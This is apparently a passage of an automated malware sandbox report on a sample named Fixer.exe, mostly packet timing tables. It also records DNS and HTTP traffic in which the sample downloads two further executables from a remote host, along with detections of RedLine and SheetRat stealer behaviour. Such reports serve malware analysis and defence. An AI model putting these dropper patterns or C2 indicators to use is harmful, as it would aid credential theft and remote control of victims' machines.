                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.316751957 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.316860914 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.316906929 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.316941977 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317055941 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317061901 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317168951 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317219973 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317339897 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317389011 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317409992 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317528963 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317542076 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317596912 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317648888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317687988 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317801952 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317878008 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317945004 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.317994118 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318109035 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318169117 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318284035 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318346024 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318464994 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318506956 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318614960 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318620920 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318731070 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318815947 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318907022 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.318955898 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319089890 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319143057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319169044 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319288969 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319401979 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319493055 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319519043 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319567919 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319691896 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319755077 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319777012 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319830894 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319892883 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.319906950 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320025921 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320102930 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320105076 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320183039 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320220947 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320257902 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320362091 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320384979 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320502996 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320547104 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320569038 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320686102 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320804119 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320805073 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320873022 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.320924997 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321036100 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321155071 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321157932 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321269035 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321274996 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321389914 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321504116 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321585894 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321620941 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321738005 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321809053 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321856022 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.321978092 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322000027 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322109938 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322217941 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322278023 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322328091 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322439909 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322556973 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322571039 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322680950 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322793007 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322808027 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.322918892 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323030949 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323052883 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323163986 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323183060 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323292971 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323375940 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323496103 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323509932 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323626041 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323709011 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.367178917 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592348099 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592453003 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592514038 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592628956 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592678070 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592780113 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592858076 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592892885 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592982054 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593095064 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593130112 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593250990 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593329906 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593343973 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593455076 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593561888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593564987 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593672037 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593806982 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593838930 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593955994 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593976021 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594082117 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594149113 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594240904 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594274044 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594386101 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594475985 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594500065 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594624043 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594670057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594733953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594850063 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594911098 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594966888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595138073 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595158100 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595201969 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595330000 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595434904 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595434904 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595546007 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595603943 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595716953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595787048 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595902920 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595953941 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596016884 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596120119 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596134901 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596189022 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596298933 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596373081 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596482992 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.869509935 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.913985014 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.963009119 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273185968 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273237944 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273535013 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.544094086 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.556463957 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.591567993 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.591842890 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.906179905 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:11.907445908 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:13.922643900 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:17.937359095 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:25.951253891 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:32.169341087 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:33.184020042 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:35.199263096 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:39.214046001 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:47.227816105 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:53.446026087 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:54.460692883 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:56.475889921 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:00.490591049 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:08.504399061 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:14.722490072 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:15.737260103 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:17.752438068 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:21.767132998 CET4975361069192.168.11.20147.185.221.24

                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.305643082 CET5720253192.168.11.201.1.1.1
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.903944016 CET53572021.1.1.1192.168.11.20

                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.305643082 CET192.168.11.201.1.1.10x7750Standard query (0)et-seattle.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.903944016 CET1.1.1.1192.168.11.200x7750No error (0)et-seattle.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                              • 89.23.97.121:1911

                                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              0192.168.11.204974989.23.97.12119117492C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.380534887 CET87OUTGET /6z9uno0baqvej0me.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 89.23.97.121:1911
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:38.661952019 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              Date: Wed, 08 Jan 2025 10:24:38 GMT
                                                                                                                                                                                                                                              Data Raw: 37 33 30 34 33 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 73 5d 5b 66 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 12 07 00 00 0a 00 00 00 00 00 00 6e 31 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 31 07 00 53 00 00 00 00 40 07 00 c4 06 00 00 00 00 00 00 00 00 00 00 00 1e 07 00 e0 11 00 00 00 60 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 73043MZ@!L!This program cannot be run in DOS mode.$PELs][fn1 @@ @1S@` H.textt `.rsrc@@@.reloc`@BP1HXD$W4f2WH33"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(.*"(4 [TRUNCATED]
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:40.480566025 CET58OUTGET /FixerNerest.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 89.23.97.121:1911
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:40.759393930 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              Date: Wed, 08 Jan 2025 10:24:40 GMT
                                                                                                                                                                                                                                              Data Raw: 36 31 34 66 33 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 73 5d 5b 66 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 10 05 00 00 de 00 00 00 00 00 00 0e 2f 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 2e 05 00 4f 00 00 00 00 40 05 00 84 db 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 48 24 00 00 00 20 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 614f3MZ@!L!This program cannot be run in DOS mode.$PELs][f/ @@ @@.O@H$ H.text `.rsrc@@@.reloc @B.H _W4f2WH33"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"(*"( [TRUNCATED]


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:05:24:16
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Fixer.exe"
                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                              File size:307'712 bytes
                                                                                                                                                                                                                                              MD5 hash:2ACDA1F917022E9E8081AD69B15330C6
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:05:24:39
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                                                                                                                                                                                                                                              Imagebase:0x280000
                                                                                                                                                                                                                                              File size:471'107 bytes
                                                                                                                                                                                                                                              MD5 hash:2E2BF344AC14353A679CCDD682273BE0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:05:24:41
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
